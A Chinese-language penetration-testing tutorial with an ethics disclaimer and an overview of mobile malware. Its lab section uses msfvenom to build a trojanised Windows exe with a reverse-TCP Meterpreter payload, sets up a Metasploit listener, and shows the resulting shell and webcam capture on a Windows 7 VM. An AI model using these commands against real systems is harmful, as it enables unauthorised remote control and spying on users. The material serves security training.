★關於道德倫理的忠告★
關於一些網絡安全實戰內容,我還是不厭其煩的寫上這些忠告,請見諒。
以下內容摘自《Metasploit滲透測試指南》
作爲一名滲透測試者,我們可以擊敗安全防禦機制,但這是僅僅是我們工作的一部分。當你進行滲透攻擊時,請記住如下的忠告:
-
不要進行惡意的攻擊;
-
不要做傻事;
-
在沒有獲得書面授權時,不要攻擊任何目標;
-
考慮你的行爲將會帶來的後果;
-
如果你幹了些非法的事情,天網恢恢疏而不漏,你總會被抓到牢裏的。
1、手機惡意應用程序分析
1.1、手機惡意應用程序理解
手機惡意應用程序:一般是指在用戶不完全知情和認可(它包括未經用戶許可、強迫引導用戶許可或隱瞞關鍵信息等)的情況下強行安裝到用戶手機中,或者一旦安裝就無法正常卸載和刪除,但又具備一定正常功能的軟件程序。它是介於病毒和正常軟件之間的軟件,它與病毒的區別是:一般還具備一定的正常功能。
1.2、危害性
惡意程序中植入的木馬程序 ,可在用戶不知情的情況下 ,收集用戶個人隱私信息、惡意扣費 。
1.3、如何實現?
很多APP由於存在大量安全漏洞和缺乏安全措施,被不法分子二次打包後,或被直接仿冒,或植入廣告、惡意代碼,甚至加入違法內容,重新投放應用市場,嚴重危害用戶隱私與財產安全,網絡“黑產”鏈條也開始滋生 。
1.4、“官方”八招對付
八招對付惡意軟件【來源於人民日報】:
1、選擇官方渠道下載
2、關注流量使用
3、謹慎ROOT
4、注意權限信息
5、安裝防病毒軟件
6、不要在未知安全性的WIFI網絡中上網
7、及時止損
8、及時舉報
2、MSF惡意程序利用
2.0、說明
因爲手機惡意程序利用的實驗,我自己沒有驗證過就暫不做分享,以win7實驗做爲示例。
2.1、製作window惡意獲取shell
後門的生成是爲了更好的理解滲透過程中的方法以及途徑,進而達到更好的防護,而不是利用技巧去做攻擊等不合理的行爲 。
思路:利用社會工程學中人的心理,爲某些軟件利用msf生成一些後門程序,進而通過帶有後門的軟件實現滲透獲取shell 。
2.1.1、簡介
msfvenom是一個Metasploit獨立的有效負載生成器,也是msfpayload和msfencode的替代品。是用來生成後門的軟件。
實驗內容:
製作Windows惡意軟件獲取shell,msfvenom的shell在windows中的使用 msfvenom生成shell.exe
2.1.2、實驗步驟
2.1.2.1、實驗環境
kali-linux系統,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4
win7系統,IP:192.168.242.6
2.1.2.2、生成後門軟件
在kali系統生成後門軟件,然後先複製到外面(本機),再複製到目標系統win7
msfvenom -p 添加載荷payload LHOST=監聽的IP LPORT=監聽的端口,只要不佔用即可 -f 輸出文件格式 > 目標文件的名稱
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe
注意:該步驟自己電腦的殺毒軟件和防火牆需要暫時關閉,如果不想關閉的話,可以利用ms17-010漏洞上傳文件到win7電腦,可以參考我前面寫的《滲透測試實戰-漏洞利用MS17-010》
2.1.2.3、啓動偵聽
在kali系統操作
# 啓動metaspliot
msfconsole
# 啓動成功結果--每次的圖案不一樣,主要關注下面的是否有msf6> 即表示成功
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 >
# metasploit設置偵聽 加載模塊
msf6 > use exploit/multi/handler
# 引用成功結果 ,再在後面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
# 設置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
#設置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip
#設置kali的端口lport =6060,也就是生成後門的端口
msf6 exploit(multi/handler) > set lport 6060
#執行
msf6 exploit(multi/handler) > exploit 或者 run
# 結果
[*] Started reverse TCP handler on 192.168.242.4:6060
2.1.2.4、win7系統雙擊後門軟件
win7系統雙擊後門軟件,然後觀察kali系統會看到有對應信息串聯起來,效果如下
[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400
2.1.2.4、操作命令控制win7系統
# 輸入命令行
meterpreter > shell
# 連接成功
Process 8856 created.
Channel 1 created.
# 退出當前操作
exit
# 可進行拍照,只要目標系統有拍照功能
# 查看攝像頭
meterpreter > webcam_list
# 結果表示有
1: Integrated Camera
# 通過攝像頭拍照
meterpreter > webcam_snap
3、資料獲取
如果需要kali和win7系統虛擬機,進行實驗的話(如果在滲透測試實戰已有下載過,不需要再下載了),請關注我的公衆號:大象只爲你,後臺回覆:虛擬機。文件有些大下載耗時會比較久。